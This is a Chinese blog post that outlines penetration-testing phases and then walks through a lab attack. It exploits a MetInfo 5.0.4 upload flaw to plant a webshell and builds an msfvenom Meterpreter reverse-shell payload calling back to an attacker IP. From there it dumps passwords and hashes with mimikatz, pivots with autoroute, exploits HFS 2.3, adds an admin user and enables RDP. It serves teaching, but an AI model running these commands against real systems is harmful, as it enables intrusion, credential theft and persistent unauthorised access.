<!DOCTYPE html>












  


<html class="theme-next muse use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">

<script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script> 
<link href="//cdn.bootcss.com/pace/1.0.2/themes/pink/pace-theme-flash.css" rel="stylesheet">













<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=6.5.0" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.5.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico?v=6.5.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon16.ico?v=6.5.0">


  <link rel="mask-icon" href="/images/logo.svg?v=6.5.0" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '6.5.0',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="渗透测试方法论前期交互阶段在前期交互阶段，渗透测试团队与客户组织进行交互讨论，最重要的是确定渗透测试的范围、目标、限制条件以及服务合同细节。 该阶段通常涉及收集客户需求、准备测试计划、定义测试范围与边界、定义业务目标、项目管理与规划等活动。 情报搜集阶段渗透测试团队可以利用各种信息来源于搜集技术方法，尝试获取更多关于目标组织网络拓扑、系统配置与安全防御措施的信息。 收集信息的方法包括公开来源信息查">
<meta property="og:type" content="article">
<meta property="og:title" content="后渗透攻击">
<meta property="og:url" content="http://yoursite.com/2018/12/27/后渗透攻击/index.html">
<meta property="og:site_name" content="guolala&#39;s blog">
<meta property="og:description" content="渗透测试方法论前期交互阶段在前期交互阶段，渗透测试团队与客户组织进行交互讨论，最重要的是确定渗透测试的范围、目标、限制条件以及服务合同细节。 该阶段通常涉及收集客户需求、准备测试计划、定义测试范围与边界、定义业务目标、项目管理与规划等活动。 情报搜集阶段渗透测试团队可以利用各种信息来源于搜集技术方法，尝试获取更多关于目标组织网络拓扑、系统配置与安全防御措施的信息。 收集信息的方法包括公开来源信息查">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fyloxtot19j30fe07sjry.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fylp1hhyd1j30fe02wwer.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fylp1yb6ruj30fe02lq3c.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fylp427o1hj30fe08sdgm.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fylp4nbvzoj30qc03xwee.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fylp64ne8mj30fe03hgm6.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fylp6e3fpej30fe04974r.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fylp7eui2pj30fe050aac.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fylp8v5d55j30fe068t95.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fylpaf1fr0j30fe050aa7.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fylpa2xma2j30fe01hmx9.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fylpgds3rnj30fe04zjrj.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fylpjfaa1jj30fe0750ta.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fylpot27gij30fe02laaq.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fylppdfqn1j30fe04xjrn.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fylppphmjbj30fe04wgm0.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fylpsbc813j30fe03rwet.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fylpsi7mbmj30fe055jrq.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fylpukhhsej30fe036weg.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fylpw6on36j30fe07u3z4.jpg">
<meta property="og:updated_time" content="2018-12-27T15:24:55.913Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="后渗透攻击">
<meta name="twitter:description" content="渗透测试方法论前期交互阶段在前期交互阶段，渗透测试团队与客户组织进行交互讨论，最重要的是确定渗透测试的范围、目标、限制条件以及服务合同细节。 该阶段通常涉及收集客户需求、准备测试计划、定义测试范围与边界、定义业务目标、项目管理与规划等活动。 情报搜集阶段渗透测试团队可以利用各种信息来源于搜集技术方法，尝试获取更多关于目标组织网络拓扑、系统配置与安全防御措施的信息。 收集信息的方法包括公开来源信息查">
<meta name="twitter:image" content="http://ww1.sinaimg.cn/large/007pEd8Wly1fyloxtot19j30fe07sjry.jpg">



  <link rel="alternate" href="/atom.xml" title="guolala's blog" type="application/atom+xml">




  <link rel="canonical" href="http://yoursite.com/2018/12/27/后渗透攻击/">



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>后渗透攻击 | guolala's blog</title>
  











  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>
<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-CN">
  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">guolala's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
      
        <p class="site-subtitle">情迷不意乱</p>
      
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-star"></i> <br>首页</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">

    
    
    
      
    

    

    <a href="/categories/" rel="section"><i class="menu-item-icon fa fa-fw fa-star"></i> <br>分类</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-star"></i> <br>归档</a>

  </li>

      
      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>搜索</a>
        </li>
      
    </ul>
  

  
    

  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/12/27/后渗透攻击/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="guolala">
      <meta itemprop="description" content="growing up">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="guolala's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">后渗透攻击
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2018-12-27 22:35:48 / 修改时间：23:24:55" itemprop="dateCreated datePublished" datetime="2018-12-27T22:35:48+08:00">2018-12-27</time>
            

            
              

              
            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing"><a href="/categories/渗透流程/" itemprop="url" rel="index"><span itemprop="name">渗透流程</span></a></span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="post-meta-item-icon">
            <i class="fa fa-eye"></i>
             阅读次数： 
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="渗透测试方法论"><a href="#渗透测试方法论" class="headerlink" title="渗透测试方法论"></a>渗透测试方法论</h1><h2 id="前期交互阶段"><a href="#前期交互阶段" class="headerlink" title="前期交互阶段"></a>前期交互阶段</h2><p>在前期交互阶段，渗透测试团队与客户组织进行交互讨论，最重要的是确定渗透测试的范围、目标、限制条件以及服务合同细节。</p>
<p>该阶段通常涉及收集客户需求、准备测试计划、定义测试范围与边界、定义业务目标、项目管理与规划等活动。</p>
<h2 id="情报搜集阶段"><a href="#情报搜集阶段" class="headerlink" title="情报搜集阶段"></a>情报搜集阶段</h2><p>渗透测试团队可以利用各种信息来源于搜集技术方法，尝试获取更多关于目标组织网络拓扑、系统配置与安全防御措施的信息。</p>
<p>收集信息的方法包括公开来源信息查询、Google Hacking、社会工程学、网络踩点、扫描探测、被动监听、服务查点等。</p>
<h2 id="威胁建模阶段"><a href="#威胁建模阶段" class="headerlink" title="威胁建模阶段"></a>威胁建模阶段</h2><p>针对获取的信息进行威胁建模与攻击规划。通过团队共同的缜密情报分析与攻击思路头脑风暴，可以从大量的信息中理清头绪，切丁最可行的攻击通道。</p>
<h2 id="漏洞分析阶段"><a href="#漏洞分析阶段" class="headerlink" title="漏洞分析阶段"></a>漏洞分析阶段</h2><p>在确定出最可行的攻击通道之后，接下来需要考虑该如何获取目标系统的访问控制权。</p>
<p>渗透测试者需要综合分析前几个阶段获取并汇总的情报信息，特别是安全漏洞扫描结果、服务查点信息等，通过搜索可获取的渗透代码资源，找出可以实施渗透攻击的攻击点，并在实验环境中进行验证。</p>
<p>在该阶段，高水平的渗透测试团队还会针对攻击通道上的一些管家你系统与服务进行安全漏洞探测与挖掘，期望找出可被利用的未知安全漏洞，并开发出渗透代码，从而打开攻击通道上的关键路径。</p>
<h2 id="渗透攻击阶段"><a href="#渗透攻击阶段" class="headerlink" title="渗透攻击阶段"></a>渗透攻击阶段</h2><p>在此环节中，渗透测试团队需要利用它们所找出的目标系统安全漏洞，来真正入侵系统当中，获得访问控制权。</p>
<p>渗透测试者还需要充分地考虑目标系统特性来定制渗透攻击，并需要挫败目标网络与系统中实施的安全防御措施，才能成功达成渗透目的。</p>
<p>在黑盒测试中，渗透测试者还需要考虑对目标系统检测机制的逃逸，从而避免造成目标组织安全响应团队的警觉和发现。</p>
<h2 id="后渗透攻击阶段"><a href="#后渗透攻击阶段" class="headerlink" title="后渗透攻击阶段"></a>后渗透攻击阶段</h2><p>在这个环节中，需要渗透测试团队根据目标的业务经营模式、保护资产形式与安全防御计划的不同特点，自主设计出攻击目标，识别关键基础设施，并寻找客户最具价值的尝试安全防护的信息和资产，最终达成能够对客户造成最重要业务影响的攻击途径</p>
<p>后渗透攻击的目标和途径是千变万化的</p>
<h2 id="报告阶段"><a href="#报告阶段" class="headerlink" title="报告阶段"></a>报告阶段</h2><p>渗透测试过程最终需要向客户提交，取得认可并成功获得合同付款就是一份渗透测试报告。</p>
<p>这份报告凝聚了之前所有阶段之中渗透测试团队所获取的管家你情报信息、探测和发掘出的系统安全漏洞、成功渗透攻击的过程，以及造成业务影响后果的攻击途径，同时还要站在防御者的角度上，帮助他们分析安全防御体系中的薄弱环节、存在的问题以及修补与升级方案。</p>
<h1 id="实战"><a href="#实战" class="headerlink" title="实战"></a>实战</h1><h2 id="确认目标站点"><a href="#确认目标站点" class="headerlink" title="确认目标站点"></a>确认目标站点</h2><p>使用浏览器打开测试站点<a href="http://www.test.com" target="_blank" rel="noopener">http://www.test.com</a></p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fyloxtot19j30fe07sjry.jpg" alt=""></p>
<h2 id="信息搜集"><a href="#信息搜集" class="headerlink" title="信息搜集"></a>信息搜集</h2><h3 id="IP收集"><a href="#IP收集" class="headerlink" title="IP收集"></a>IP收集</h3><p>使用ping 命令初步判定ip 地址为<code>10.10.10.201</code>，但是显示请求超时，目标网站可能有防火墙设置。</p>
<h3 id="网站技术架构识别"><a href="#网站技术架构识别" class="headerlink" title="网站技术架构识别"></a>网站技术架构识别</h3><p>根据HTTP 报文的响应头部，可以初步判断网站技术架构。</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fylp1hhyd1j30fe02wwer.jpg" alt=""></p>
<p>通过浏览网站信息，发现该网站使用meinfo，并且他的版本号码是5.0.4。</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fylp1yb6ruj30fe02lq3c.jpg" alt=""></p>
<h2 id="漏洞分析与利用"><a href="#漏洞分析与利用" class="headerlink" title="漏洞分析与利用"></a>漏洞分析与利用</h2><p>metinfov5.0.4 存在文件上传漏洞，可以直接使用提前写好的脚本GetShell。</p>
<p>Shell 地址为：</p>
<p><code>http://www.test.com/upload/file/1544783891.php</code></p>
<p>输入密码[cmd]，即可进入大马。</p>
<h2 id="后渗透"><a href="#后渗透" class="headerlink" title="后渗透"></a>后渗透</h2><p>后渗透就是就是扩大渗透攻击的深度与广度。其中涉及到目标系统重要资产发现，权限提升，维持访问等等操作。</p>
<h3 id="查看开放的端口"><a href="#查看开放的端口" class="headerlink" title="查看开放的端口"></a>查看开放的端口</h3><p>发现Web 服务器上开放的端口如下，</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fylp427o1hj30fe08sdgm.jpg" alt=""></p>
<p>经过简单判断，得到如下信息</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fylp4nbvzoj30qc03xwee.jpg" alt=""></p>
<h3 id="用户账户信息"><a href="#用户账户信息" class="headerlink" title="用户账户信息"></a>用户账户信息</h3><p>查看所有账户</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fylp64ne8mj30fe03hgm6.jpg" alt=""></p>
<p>在这里，我们可以创建一个用户并加入到管理员组，但是我个人觉得意义不大。</p>
<h3 id="查看IP地址"><a href="#查看IP地址" class="headerlink" title="查看IP地址"></a>查看IP地址</h3><p>在WebShell 中，查看IP 地址发现是[192.168.1.100]，这跟域名解析出来的地址不同。说明Web 服务器有可能在内网中。并且网关是[192.168.1.254]。</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fylp6e3fpej30fe04974r.jpg" alt=""></p>
<p>这里面我们是没有办法与192.168.1.100 直接进行通信的。我们尝试一下内网能否访问我们。嗯，可以访问，问题不大。</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fylp7eui2pj30fe050aac.jpg" alt=""></p>
<p>我们可以尝试反弹Shell ，并且使用强大的后渗透工具–Meterpreter。</p>
<h2 id="反弹shell"><a href="#反弹shell" class="headerlink" title="反弹shell"></a>反弹shell</h2><h3 id="制作反弹Shell-exe-文件"><a href="#制作反弹Shell-exe-文件" class="headerlink" title="制作反弹Shell exe 文件"></a>制作反弹Shell exe 文件</h3><pre><code>msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.197 LPORT=4444 -f exe -o payload.exe
</code></pre><h3 id="配置MSF"><a href="#配置MSF" class="headerlink" title="配置MSF"></a>配置MSF</h3><p>具体命令如下：</p>
<pre><code>msf &gt; use exploit/multi/handler

msf exploit(multi/handler) &gt; set payload windows/meterpreter/reverse_tcp

payload =&gt; windows/meterpreter/reverse_tcp

msf exploit(multi/handler) &gt; set LHOST 10.10.10.197

LHOST =&gt; 10.10.10.197

msf exploit(multi/handler) &gt; exploit
</code></pre><p>将生成的payload.exe 文件直接上传到目标服务器，直接运行，就可以得到Meterpreter会话。</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fylp8v5d55j30fe068t95.jpg" alt=""></p>
<p>这个Meterpreter 会话的ID 是1 ，这个是由payload.exe 文件反弹回来的Shell，如果进程结束，会丢失该会话。</p>
<h2 id="迁移进程"><a href="#迁移进程" class="headerlink" title="迁移进程"></a>迁移进程</h2><p>通过ps命令查看系统进程</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fylpaf1fr0j30fe050aa7.jpg" alt=""></p>
<pre><code>migrate 3724
</code></pre><p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fylpa2xma2j30fe01hmx9.jpg" alt=""></p>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><p> 我们可以进一步收集Web 服务器192.168.1.100 的相关信息。</p>
<pre><code>getuid

#权限查看

systinfo

#系统信息

ipconfig

#网络信息

run post/windows/gather/checkvm

#是否虚拟机

run post/linux/gather/checkvm 

#是否虚拟机

run post/windows/gather/forensics/enum_drives

#查看分区

run post/windows/gather/enum_applications

#获取安装软件信息

run post/windows/gather/dumplinks 

#获取最近的文件操作

run post/windows/gather/enum_ie  

#获取IE缓存

run post/windows/gather/enum_chrome   

#获取Chrome缓存

run post/windows/gather/enum_patches  

#补丁信息

run post/windows/gather/enum_domain  

#查找域控
</code></pre><h3 id="抓取明文密码"><a href="#抓取明文密码" class="headerlink" title="抓取明文密码"></a>抓取明文密码</h3><p>导入mimikatz</p>
<p>到处密码<code>kerberos</code></p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fylpgds3rnj30fe04zjrj.jpg" alt=""></p>
<p>我们可以导出目标服务器的用户名和密码[Administrator/123.com]</p>
<h3 id="远程桌面与截屏"><a href="#远程桌面与截屏" class="headerlink" title="远程桌面与截屏"></a>远程桌面与截屏</h3><pre><code>run vnc
</code></pre><p>直接登录目标服务器。</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fylpjfaa1jj30fe0750ta.jpg" alt=""></p>
<p>还有很多命令如下：</p>
<pre><code>enumdesktops  

#查看可用的桌面

getdesktop    

#获取当前meterpreter 关联的桌面

set_desktop   

#设置meterpreter关联的桌面  -h查看帮助

screenshot  

#截屏

use espia  

#或者使用espia模块截屏  然后输入screengrab

run vnc  

#使用vnc远程桌面连接
</code></pre><p> 到此为止，这台服务器已经完全在我们的掌控之中。</p>
<h2 id="扩大战果"><a href="#扩大战果" class="headerlink" title="扩大战果"></a>扩大战果</h2><h3 id="查看arp-缓存"><a href="#查看arp-缓存" class="headerlink" title="查看arp 缓存"></a>查看arp 缓存</h3><pre><code>arp
</code></pre><h3 id="查看路由信息"><a href="#查看路由信息" class="headerlink" title="查看路由信息"></a>查看路由信息</h3><pre><code>route 
</code></pre><h3 id="添加路由"><a href="#添加路由" class="headerlink" title="添加路由"></a>添加路由</h3><pre><code>run autoroute -s 192.168.1.0/24
</code></pre><p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fylpot27gij30fe02laaq.jpg" alt=""></p>
<h3 id="查看添加的路由信息"><a href="#查看添加的路由信息" class="headerlink" title="查看添加的路由信息"></a>查看添加的路由信息</h3><pre><code>run autoroute -p
</code></pre><h3 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h3><p>发现目标开启了80 端口</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fylppdfqn1j30fe04xjrn.jpg" alt=""></p>
<h3 id="版本信息测探"><a href="#版本信息测探" class="headerlink" title="版本信息测探"></a>版本信息测探</h3><p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fylppphmjbj30fe04wgm0.jpg" alt=""></p>
<h2 id="再次渗透攻击"><a href="#再次渗透攻击" class="headerlink" title="再次渗透攻击"></a>再次渗透攻击</h2><p>我们发现[192.168.1.200] 这台机器上80 端口运行着HFS 服务。这个[HFS 2.3 beta]版本存在远程代码执行漏洞。我们可以再次发起渗透攻击。（利用msf）</p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fylpsbc813j30fe03rwet.jpg" alt=""></p>
<p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fylpsi7mbmj30fe055jrq.jpg" alt=""></p>
<h3 id="切入会话-5"><a href="#切入会话-5" class="headerlink" title="切入会话 5"></a>切入会话 5</h3><pre><code>sessions -i 5
</code></pre><h3 id="查看权限"><a href="#查看权限" class="headerlink" title="查看权限"></a>查看权限</h3><pre><code>getuid
</code></pre><h3 id="尝试提权"><a href="#尝试提权" class="headerlink" title="尝试提权"></a>尝试提权</h3><pre><code>getsystem
</code></pre><h3 id="进程迁移"><a href="#进程迁移" class="headerlink" title="进程迁移"></a>进程迁移</h3><pre><code>migrate 12
</code></pre><h3 id="尝试导出账户hash-值"><a href="#尝试导出账户hash-值" class="headerlink" title="尝试导出账户hash 值"></a>尝试导出账户hash 值</h3><pre><code>run hashdump
</code></pre><h3 id="查看IP信息"><a href="#查看IP信息" class="headerlink" title="查看IP信息"></a>查看IP信息</h3><p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fylpukhhsej30fe036weg.jpg" alt=""></p>
<h3 id="开启远程桌面连接"><a href="#开启远程桌面连接" class="headerlink" title="开启远程桌面连接"></a>开启远程桌面连接</h3><pre><code>run post/windows/manage/enable_rdp
</code></pre><h3 id="添加用户"><a href="#添加用户" class="headerlink" title="添加用户"></a>添加用户</h3><pre><code>net localgroup administrators abc /add
</code></pre><h3 id="端口转发"><a href="#端口转发" class="headerlink" title="端口转发"></a>端口转发</h3><pre><code>portfwd add -l 33891 -p 3389 -r 127.0.0.1
</code></pre><h3 id="远程桌面登录"><a href="#远程桌面登录" class="headerlink" title="远程桌面登录"></a>远程桌面登录</h3><p><img src="http://ww1.sinaimg.cn/large/007pEd8Wly1fylpw6on36j30fe07u3z4.jpg" alt=""></p>

      
    </div>

    

    
    
    

    

    
       
    
    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/12/23/TCP-IP/" rel="next" title="TCP/IP">
                <i class="fa fa-chevron-left"></i> TCP/IP
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/avatar.gif" alt="guolala">
            
              <p class="site-author-name" itemprop="name">guolala</p>
              <p class="site-description motion-element" itemprop="description">growing up</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">40</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">23</span>
                    <span class="site-state-item-name">分类</span>
                  </a>
                </div>
              

              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="https://weibo.com/6791921870/" title="Weibo &rarr; https://weibo.com/6791921870/" rel="noopener" target="_blank"><i class="fa fa-fw fa-weibo"></i>Weibo</a>
                </span>
              
            </div>
          

          

          
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#渗透测试方法论"><span class="nav-number">1.</span> <span class="nav-text">渗透测试方法论</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#前期交互阶段"><span class="nav-number">1.1.</span> <span class="nav-text">前期交互阶段</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#情报搜集阶段"><span class="nav-number">1.2.</span> <span class="nav-text">情报搜集阶段</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#威胁建模阶段"><span class="nav-number">1.3.</span> <span class="nav-text">威胁建模阶段</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞分析阶段"><span class="nav-number">1.4.</span> <span class="nav-text">漏洞分析阶段</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#渗透攻击阶段"><span class="nav-number">1.5.</span> <span class="nav-text">渗透攻击阶段</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#后渗透攻击阶段"><span class="nav-number">1.6.</span> <span class="nav-text">后渗透攻击阶段</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#报告阶段"><span class="nav-number">1.7.</span> <span class="nav-text">报告阶段</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#实战"><span class="nav-number">2.</span> <span class="nav-text">实战</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#确认目标站点"><span class="nav-number">2.1.</span> <span class="nav-text">确认目标站点</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#信息搜集"><span class="nav-number">2.2.</span> <span class="nav-text">信息搜集</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#IP收集"><span class="nav-number">2.2.1.</span> <span class="nav-text">IP收集</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#网站技术架构识别"><span class="nav-number">2.2.2.</span> <span class="nav-text">网站技术架构识别</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞分析与利用"><span class="nav-number">2.3.</span> <span class="nav-text">漏洞分析与利用</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#后渗透"><span class="nav-number">2.4.</span> <span class="nav-text">后渗透</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#查看开放的端口"><span class="nav-number">2.4.1.</span> <span class="nav-text">查看开放的端口</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#用户账户信息"><span class="nav-number">2.4.2.</span> <span class="nav-text">用户账户信息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查看IP地址"><span class="nav-number">2.4.3.</span> <span class="nav-text">查看IP地址</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#反弹shell"><span class="nav-number">2.5.</span> <span 